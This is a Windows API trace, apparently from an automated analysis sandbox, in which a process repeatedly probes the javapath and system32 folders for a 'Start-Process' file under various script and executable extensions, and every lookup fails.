	[0058.136] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xe02be364, ftCreationTime.dwHighDateTime=0x1d31d80, ftLastAccessTime.dwLowDateTime=0xe02be364, ftLastAccessTime.dwHighDateTime=0x1d31d80, ftLastWriteTime.dwLowDateTime=0xe02be364, ftLastWriteTime.dwHighDateTime=0x1d31d80, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0058.136] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.136] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.136] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0058.136] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.WSH", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.WSH", lpFilePart=0x0) returned 0x35
	[0058.136] GetFullPathNameW (in: lpFileName="Start-Process.WSH", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.WSH", lpFilePart=0x0) returned 0x2b
	[0058.136] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.WSH", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.137] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0058.137] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.137] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xe02be364, ftCreationTime.dwHighDateTime=0x1d31d80, ftLastAccessTime.dwLowDateTime=0xe02be364, ftLastAccessTime.dwHighDateTime=0x1d31d80, ftLastWriteTime.dwLowDateTime=0xe02be364, ftLastWriteTime.dwHighDateTime=0x1d31d80, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0058.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.137] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.137] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0058.137] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.MSC", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.MSC", lpFilePart=0x0) returned 0x35
	[0058.137] GetFullPathNameW (in: lpFileName="Start-Process.MSC", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.MSC", lpFilePart=0x0) returned 0x2b
	[0058.137] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.MSC", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.138] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.138] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.138] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0058.138] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.138] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xe02be364, ftCreationTime.dwHighDateTime=0x1d31d80, ftLastAccessTime.dwLowDateTime=0xe02be364, ftLastAccessTime.dwHighDateTime=0x1d31d80, ftLastWriteTime.dwLowDateTime=0xe02be364, ftLastWriteTime.dwHighDateTime=0x1d31d80, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0058.138] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.138] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.138] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0058.138] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.CPL", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.CPL", lpFilePart=0x0) returned 0x35
	[0058.138] GetFullPathNameW (in: lpFileName="Start-Process.CPL", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.CPL", lpFilePart=0x0) returned 0x2b
	[0058.138] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.CPL", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.138] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.139] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.139] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0058.139] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.139] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xe02be364, ftCreationTime.dwHighDateTime=0x1d31d80, ftLastAccessTime.dwLowDateTime=0xe02be364, ftLastAccessTime.dwHighDateTime=0x1d31d80, ftLastWriteTime.dwLowDateTime=0xe02be364, ftLastWriteTime.dwHighDateTime=0x1d31d80, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0058.139] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.139] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.139] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0058.139] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process", lpFilePart=0x0) returned 0x31
	[0058.139] GetFullPathNameW (in: lpFileName="Start-Process", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process", lpFilePart=0x0) returned 0x27
	[0058.139] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.139] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.140] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.140] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.140] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb7360118, ftLastAccessTime.dwHighDateTime=0x1d3a580, ftLastWriteTime.dwLowDateTime=0xb7360118, ftLastWriteTime.dwHighDateTime=0x1d3a580, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1
	[0058.140] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.140] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Process.ps1", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Process.ps1", lpFilePart=0x0) returned 0x25
	[0058.140] GetFullPathNameW (in: lpFileName="Start-Process.ps1", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.ps1", lpFilePart=0x0) returned 0x2b
	[0058.140] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Process.ps1", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.140] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.140] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.141] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.141] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb7360118, ftLastAccessTime.dwHighDateTime=0x1d3a580, ftLastWriteTime.dwLowDateTime=0xb7360118, ftLastWriteTime.dwHighDateTime=0x1d3a580, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1
	[0058.141] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.141] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Process.psm1", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Process.psm1", lpFilePart=0x0) returned 0x26
	[0058.149] GetFullPathNameW (in: lpFileName="Start-Process.psm1", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.psm1", lpFilePart=0x0) returned 0x2c
	[0058.149] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Process.psm1", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.150] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.150] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.150] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb7360118, ftLastAccessTime.dwHighDateTime=0x1d3a580, ftLastWriteTime.dwLowDateTime=0xb7360118, ftLastWriteTime.dwHighDateTime=0x1d3a580, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1
	[0058.150] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.150] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Process.psd1", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Process.psd1", lpFilePart=0x0) returned 0x26
	[0058.150] GetFullPathNameW (in: lpFileName="Start-Process.psd1", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.psd1", lpFilePart=0x0) returned 0x2c
	[0058.150] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Process.psd1", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.150] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.150] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.150] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.150] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb7360118, ftLastAccessTime.dwHighDateTime=0x1d3a580, ftLastWriteTime.dwLowDateTime=0xb7360118, ftLastWriteTime.dwHighDateTime=0x1d3a580, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1
	[0058.150] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.151] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Process.COM", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Process.COM", lpFilePart=0x0) returned 0x25
	[0058.151] GetFullPathNameW (in: lpFileName="Start-Process.COM", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.COM", lpFilePart=0x0) returned 0x2b
	[0058.151] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Process.COM", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.151] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.151] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.151] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.151] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb7360118, ftLastAccessTime.dwHighDateTime=0x1d3a580, ftLastWriteTime.dwLowDateTime=0xb7360118, ftLastWriteTime.dwHighDateTime=0x1d3a580, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1
	[0058.151] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.151] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Process.EXE", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Process.EXE", lpFilePart=0x0) returned 0x25
	[0058.151] GetFullPathNameW (in: lpFileName="Start-Process.EXE", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.EXE", lpFilePart=0x0) returned 0x2b
	[0058.151] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Process.EXE", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.151] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.152] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.152] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.152] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb7360118, ftLastAccessTime.dwHighDateTime=0x1d3a580, ftLastWriteTime.dwLowDateTime=0xb7360118, ftLastWriteTime.dwHighDateTime=0x1d3a580, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1
	[0058.152] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.152] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Process.BAT", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Process.BAT", lpFilePart=0x0) returned 0x25
	[0058.152] GetFullPathNameW (in: lpFileName="Start-Process.BAT", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.BAT", lpFilePart=0x0) returned 0x2b
	[0058.152] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Process.BAT", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.152] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.152] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.152] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.152] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb7360118, ftLastAccessTime.dwHighDateTime=0x1d3a580, ftLastWriteTime.dwLowDateTime=0xb7360118, ftLastWriteTime.dwHighDateTime=0x1d3a580, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1
	[0058.152] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.152] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Process.CMD", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Process.CMD", lpFilePart=0x0) returned 0x25
	[0058.153] GetFullPathNameW (in: lpFileName="Start-Process.CMD", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.CMD", lpFilePart=0x0) returned 0x2b
	[0058.153] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Process.CMD", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.157] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.157] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.157] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.157] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb7360118, ftLastAccessTime.dwHighDateTime=0x1d3a580, ftLastWriteTime.dwLowDateTime=0xb7360118, ftLastWriteTime.dwHighDateTime=0x1d3a580, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1
	[0058.157] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.157] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Process.VBS", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Process.VBS", lpFilePart=0x0) returned 0x25
	[0058.158] GetFullPathNameW (in: lpFileName="Start-Process.VBS", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.VBS", lpFilePart=0x0) returned 0x2b
	[0058.158] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Process.VBS", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.158] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.158] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.158] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.158] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb7360118, ftLastAccessTime.dwHighDateTime=0x1d3a580, ftLastWriteTime.dwLowDateTime=0xb7360118, ftLastWriteTime.dwHighDateTime=0x1d3a580, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1
	[0058.158] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.158] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Process.VBE", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Process.VBE", lpFilePart=0x0) returned 0x25
